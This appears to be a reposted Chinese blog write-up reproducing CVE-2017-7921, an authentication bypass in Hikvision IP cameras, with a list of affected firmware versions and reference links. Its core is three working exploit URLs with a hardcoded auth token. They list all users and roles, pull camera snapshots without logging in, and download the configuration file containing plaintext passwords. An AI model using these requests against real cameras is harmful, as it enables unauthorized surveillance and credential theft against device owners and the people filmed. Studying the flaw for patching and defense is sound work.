CVE-2017-7921 漏洞復現


聲明

本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良后果與文章作者無關。


一、漏洞介紹

許多Hikvision IP相機包含一個后門,允許未經身份驗證假冒任何配置用戶帳戶。至少從2014年起,海康威視的產品就存在這一漏洞。除了hikvision品牌的設備外,它還影響了許多以各種品牌名稱出售的白標相機產品。成千上萬的易受攻擊的設備在發布時仍暴露在互聯網上。除了獲得完全的管理訪問權限外,該漏洞還可用於檢索所有配置用戶的明文密碼。

二、漏洞復現

1、檢索所有用戶及其角色的列表

http://camera.ip/Security/users?auth=YWRtaW46MTEK

 

2、在沒有身份驗證的情況下獲取相機快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

 

3、下載相機配置

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

 

 三、漏洞影響版本

DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106

四、參考鏈接

https://packetstormsecurity.com/files/144097/hikvisionip-bypass.txt

https://www.seebug.org/vuldb/ssvid-96469

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM